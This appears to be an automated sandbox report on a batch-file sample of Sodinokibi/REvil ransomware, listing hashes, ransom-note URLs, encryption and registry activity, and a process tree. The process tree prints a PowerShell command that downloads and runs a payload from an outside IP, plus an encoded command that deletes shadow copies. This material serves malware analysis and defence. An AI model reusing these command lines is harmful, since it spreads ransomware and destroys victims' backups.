Analysis
max time kernel: 143s
max time network: 133s
platform: windows7_x64
resource: win7v200217
submitted: 04-03-2020 16:10
Static task: static1
Behavioral task: behavioral1
  Sample: UJvbivju.bat
  Resource: win7v200217
Behavioral task: behavioral2
  Sample: UJvbivju.bat
  Resource: win10v200217
General
Target: UJvbivju.bat
Size: 189B
MD5: 30e9f006bd27f61b87649fb861b70525
SHA1: 602c170aa87ed68a7c5f68f15a162bdbd51dfc1f
SHA256: c27c8d9ea31e707420a5f77581ead62b943e9195989ff1d5df30d0ecafefe2e6
SHA512: f9c62d8bff196da519b3c336d079781f33cdd0123f910448d9b8be41b732b149dbbed44e1bdb58ebf67d914ae4ec0d376ac16688851ea6714a21cf638a6cd7ae
Malware Config
Extracted: http://185.103.242.78/pastes/UJvbivju
Extracted: C:\7dx1t04r65-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F6228642C93D0AF2
  http://decryptor.cc/F6228642C93D0AF2
Signatures

Discovering connected drives (3 TTPs, 7 IoCs)
Processes: cmd.exe, powershell.exe, powershell.exe
description | ioc | process
File opened (read-only) | \??\C: | cmd.exe
File opened (read-only) | \??\C: | powershell.exe
File opened (read-only) | \??\A: | powershell.exe
File opened (read-only) | \??\B: | powershell.exe
File opened (read-only) | \??\F: | powershell.exe
File opened (read-only) | \??\C: | powershell.exe
File opened (read-only) | \??\E: | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\736utrh656.bmp" | powershell.exe
Modifies system certificate store
Processes: powershell.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data not shown] | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [blob data not shown] | powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1828 wrote to memory of 1852 | 1828 | cmd.exe | powershell.exe
PID 1852 wrote to memory of 1956 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1956 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1956 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1956 | 1852 | powershell.exe | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
1852 | powershell.exe
1852 | powershell.exe
1852 | powershell.exe
1956 | powershell.exe
1956 | powershell.exe
Blacklisted process makes network request (82 IoCs)
Processes: powershell.exe
flow | pid | process
3, 5, 7, 9, 11, 12, 14, 15, 17, 18, 20, 22, 24, 25, 27, 28, 31, 32, 34, 36, 37, 39, 41, 43, 45, 47, 50, 51, 53, 55, 58, 59, 61, 63, 65, 67, 69, 71, 73, 75, 76, 78, 80, 82, 84, 86, 88, 90, 92, 93, 95, 96, 98, 100, 101, 103, 104, 106, 111, 113, 115, 118, 120, 122 | 1852 | powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\EditRepair.mpv2 | powershell.exe
File opened for modification | \??\c:\program files\UnpublishSync.aifc | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\7dx1t04r65-readme.txt | powershell.exe
File renamed | C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.7dx1t04r65 | powershell.exe
File renamed | C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\SuspendGrant.m4a | powershell.exe
File opened for modification | \??\c:\program files\UnpublishConvertTo.rmi | powershell.exe
File renamed | C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\GrantOpen.inf | powershell.exe
File opened for modification | \??\c:\program files\LockBackup.au | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\7dx1t04r65-readme.txt | powershell.exe
File renamed | C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.7dx1t04r65 | powershell.exe
File renamed | C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.7dx1t04r65 | powershell.exe
File created | \??\c:\program files\7dx1t04r65-readme.txt | powershell.exe
File renamed | C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\ConvertToFormat.ini | powershell.exe
File opened for modification | \??\c:\program files\RestartSave.xltm | powershell.exe
File opened for modification | \??\c:\program files\RestartUninstall.midi | powershell.exe
File renamed | C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\SkipApprove.xhtml | powershell.exe
File renamed | C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.7dx1t04r65 | powershell.exe
File renamed | C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.7dx1t04r65 | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7dx1t04r65-readme.txt | powershell.exe
File renamed | C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.7dx1t04r65 | powershell.exe
File renamed | C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.7dx1t04r65 | powershell.exe
File renamed | C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\DisableCopy.M2T | powershell.exe
File renamed | C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.7dx1t04r65 | powershell.exe
File opened for modification | \??\c:\program files\SplitRestart.bmp | powershell.exe
File renamed | C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.7dx1t04r65 | powershell.exe
File created | \??\c:\program files (x86)\7dx1t04r65-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ExpandProtect.ods | powershell.exe
File opened for modification | \??\c:\program files\MoveWait.tif | powershell.exe
Drops file in System32 directory (1 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
pid | process
1852 | powershell.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 1852 | powershell.exe
Token: SeDebugPrivilege | 1852 | powershell.exe
Token: SeDebugPrivilege | 1956 | powershell.exe
Token: SeBackupPrivilege | 1352 | vssvc.exe
Token: SeRestorePrivilege | 1352 | vssvc.exe
Token: SeAuditPrivilege | 1352 | vssvc.exe
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\UJvbivju.bat"
  PID: 1828
  - Discovering connected drives
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/UJvbivju');Invoke-QGTRJX;Start-Sleep -s 10000"
    PID: 1852
    - Discovering connected drives
    - Sets desktop wallpaper using registry
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in System32 directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 1956
      - Discovering connected drives
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1352
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken